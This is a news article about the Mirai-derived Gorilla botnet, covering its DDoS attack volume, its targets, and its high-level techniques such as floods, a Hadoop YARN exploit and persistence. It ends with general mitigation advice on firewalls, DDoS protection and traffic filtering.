• Gorilla Botnet launches over 300,000 DDoS attacks.
• Organisations must strengthen security with firewalls, DDoS protection, and traffic filtering.

A new botnet named Gorilla (also known as GorillaBot) is creating headlines in the cybersecurity industry, and its origins can be traced back to the infamous Mirai botnet. For those unfamiliar, a botnet is a network of infected devices controlled by attackers that are frequently used to perform DDoS (Distributed Denial-of-Service) attacks by flooding targets with traffic.

But Gorilla isn’t your typical malware – it’s a much more sophisticated strain that incorporates many tricks from Mirai’s leaked source code.

Gorilla Botnet goes beyond typical DDoS botnets by targeting multiple industries and countries. According to NSFOCUS, the cybersecurity firm that identified the strain in September 2024, Gorilla has been incredibly active. It issued nearly 300,000 attack commands in less than a month, averaging 20,000 a day. The attacks were hardly small-scale; Gorilla targeted more than 100 nations, including economic powerhouses such as China, the US, Canada, and Germany. The botnet targeted important industries including universities, government websites, telecoms, banks, and gaming platforms.

Essentially, the Gorilla botnet is a network of compromised IoT devices and computers that the attackers can control remotely. The devices comprise an army capable of carrying out large-scale DDoS attacks, flooding targeted systems with traffic to the extent that they become inaccessible. What makes Gorilla so dangerous is how it uses a wide range of attack tactics, from UDP and SYN floods to more specialised approaches such as the Valve Source Engine (VSE) flood. It even makes use of UDP’s connectionless nature, spoofing IP addresses and flooding targets with fake traffic.

But it does not end there. Gorilla also exploits a vulnerability in Apache Hadoop YARN RPC, known since 2021, to remotely execute commands on infected devices. To ensure its persistence, the malware installs a service on the infected host, allowing it to execute automatically every time the system starts. This makes it more difficult for victims to get rid of the infection.

In addition, Gorilla Botnet possesses impressive stealth capabilities. To hide its activities and avoid detection, it uses encryption algorithms common to the Keksec group, a notorious hacking organisation. The encryption and persistence reveal how sophisticated this malware is.

The botnet isn’t entirely new. According to Fox_threatintel, a security researcher, Gorilla Botnet has been operating for over a year, but its recent surge in attacks has drawn attention.

Mitigation strategies

To protect against threats like Gorilla Botnet, organisations should adopt proactive mitigation strategies. Attacks can be devastating, but there are several ways to strengthen defences:

1. Deploy firewalls and intrusion detection systems (IDS): Firewalls can help block suspicious traffic from reaching an organisation’s network, while an IDS can detect abnormal traffic patterns and alert teams to potential attacks.
2. Use cloud-based DDoS protection services: Cloud providers often offer scalable DDoS protection, which can absorb and mitigate the effects of high-volume attacks, ensuring minimal downtime for critical systems.
3. Implement rate-limiting and traffic filtering: By limiting the number of requests allowed to a service in a given timeframe (rate-limiting), organisations can reduce the effectiveness of botnets such as Gorilla. Traffic filtering can also block malicious traffic while allowing legitimate users to access services.

By implementing these strategies, organisations can better prepare for many instances of DDoS attacks. As botnets like Gorilla evolve, it’s critical to implement a multilayered security strategy that incorporates these types of tools and procedures.

To summarise, Gorilla Botnet is a huge menace, wreaking havoc using cutting-edge techniques. Its sophisticated malware infrastructure and global attack scope serve as a wake-up call for companies to strengthen their cybersecurity defences and remain vigilant.